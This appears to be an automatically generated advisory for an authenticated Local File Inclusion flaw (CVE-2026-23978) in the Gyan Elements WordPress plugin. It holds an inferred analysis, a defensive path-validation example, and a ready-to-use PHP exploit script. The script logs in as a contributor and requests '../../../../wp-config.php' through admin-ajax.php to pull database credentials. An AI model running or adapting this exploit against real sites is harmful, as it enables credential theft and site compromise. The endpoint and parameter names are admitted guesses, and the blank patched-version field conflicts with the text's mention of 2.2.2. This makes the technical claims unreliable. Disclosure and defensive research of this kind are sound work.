Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-23978: Gyan Elements <= 2.2.1 – Authenticated (Contributor+) Local File Inclusion (gyan-elements)

Plugin: gyan-elements
Severity: High (CVSS 7.5)
CWE: 98
Vulnerable Version: 2.2.1
Patched Version:
Disclosed: January 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23978 (metadata-based):
The Gyan Elements WordPress plugin, version 2.2.1 and earlier, contains an authenticated Local File Inclusion vulnerability. The flaw allows users with contributor-level permissions or higher to include arbitrary files from the server’s filesystem, potentially leading to remote code execution. The CVSS 3.1 score of 7.5 (High) reflects the combination of high impact with moderate attack complexity.

CWE-98, ‘Improper Control of Filename for Include/Require Statement in PHP Program’, directly indicates the root cause. Atomic Edge research infers that a PHP file inclusion function (include, require, include_once, require_once) receives user-controlled input without proper validation. The vulnerability description confirms attackers can include and execute arbitrary files. The plugin likely passes unsanitized user input directly to a file inclusion function. Without access to source code, this conclusion remains inferred from the CWE classification and public description.

Exploitation requires an authenticated attacker with contributor privileges. Atomic Edge analysis suggests the attack vector is likely a WordPress AJAX handler or admin endpoint. The plugin slug ‘gyan-elements’ typically maps to AJAX actions like ‘gyan_elements_action’ or REST API routes under the ‘/wp-json/gyan-elements/’ namespace. An attacker would send a POST request to ‘/wp-admin/admin-ajax.php’ with an ‘action’ parameter targeting the vulnerable function. The request includes a parameter, possibly named ‘file’, ‘template’, or ‘path’, containing a relative or absolute path to a local file (e.g., ‘../../wp-config.php’). If the server allows file uploads, an attacker could upload a malicious image with embedded PHP code and include it.

Remediation requires implementing strict validation and sanitization of user-supplied file paths. The patched version (2.2.2) likely added an allowlist of permitted files or directories. Developers should replace dynamic file inclusion with static mappings when possible. If dynamic inclusion remains necessary, the code must validate user input against a strict allowlist, normalize paths to prevent directory traversal, and ensure included files reside within a designated safe directory. PHP functions like realpath() and basename() can help with path validation.
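The remediation steps above, as an added example that is not the plugin's code or its actual patch: a static key-to-file mapping followed by realpath() canonicalization and a containment check. The function name `ae_resolve_template`, the constant `AE_TEMPLATES`, the template keys and the temporary directory are all hypothetical.

```php
<?php
// Added example: hypothetical names throughout; not Gyan Elements code or its patch.
// Pattern the analysis infers (CWE-98), hypothetical: include $dir . '/' . $_POST['file'];

// Static mapping: the request supplies a key, never a path.
const AE_TEMPLATES = [
    'card'   => 'card.php',
    'banner' => 'banner.php',
];

/**
 * Resolve a user-supplied template key to an absolute path inside $base_dir.
 * Returns null for anything not on the allowlist or outside the directory.
 */
function ae_resolve_template(string $key, string $base_dir): ?string
{
    // 1. Allowlist lookup; traversal strings such as "../../wp-config.php" fail here.
    if (!array_key_exists($key, AE_TEMPLATES)) {
        return null;
    }

    // 2. Canonicalize both sides; realpath() resolves ".." and symlinks, and returns false if missing.
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . AE_TEMPLATES[$key]);
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment check with a trailing separator so "/templates-evil" does not match "/templates".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: build a throwaway templates directory and try good and bad keys.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ae_templates_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'card.php', "<?php echo 'card';\n");

foreach (['card', 'banner', '../../wp-config.php', 'card.php'] as $input) {
    $resolved = ae_resolve_template($input, $dir);
    printf("%-22s => %s\n", $input, $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

unlink($dir . DIRECTORY_SEPARATOR . 'card.php');
rmdir($dir);
```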

Successful exploitation grants an attacker the ability to read sensitive server files, including WordPress configuration files containing database credentials. Inclusion of uploaded files containing PHP code leads to arbitrary command execution with the web server’s privileges. This bypasses access controls and can result in complete site compromise. Attackers may achieve privilege escalation, data exfiltration, or persistent backdoor installation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-23978 - Gyan Elements <= 2.2.1 - Authenticated (Contributor+) Local File Inclusion
/**
 * Proof-of-Concept for CVE-2026-23978.
 * This script demonstrates authenticated Local File Inclusion in the Gyan Elements plugin.
 * Assumptions based on Atomic Edge analysis:
 * 1. The vulnerability exists in an AJAX handler or REST endpoint.
 * 2. The endpoint is accessible to users with 'contributor' role or higher.
 * 3. A parameter (inferred as 'file') accepts unsanitized file paths.
 * 4. The plugin slug 'gyan-elements' maps to an AJAX action prefix.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor account
$password = 'contributor_pass'; // CHANGE THIS

// Step 1: Authenticate and obtain WordPress session cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);

// Step 2: Exploit the Local File Inclusion vulnerability
// Inferred endpoint: WordPress AJAX handler with plugin-specific action
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Inferred parameter name based on common LFI patterns in WordPress plugins
// Attempt to read the WordPress configuration file
$exploit_data = array(
    'action' => 'gyan_elements_action', // Inferred AJAX action name
    'file' => '../../../../wp-config.php' // Directory traversal to sensitive file
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Check for successful file inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[+] Vulnerability likely exploited. Retrieved data:\n\n";
    echo substr($response, 0, 2000) . "\n...\n";
} else {
    echo "[-] Exploit attempt unsuccessful or patched.\n";
    echo "Response preview: " . substr($response, 0, 500) . "\n";
    echo "Consider trying alternative parameter names: template, path, include, page\n";
}

curl_close($ch);
?>
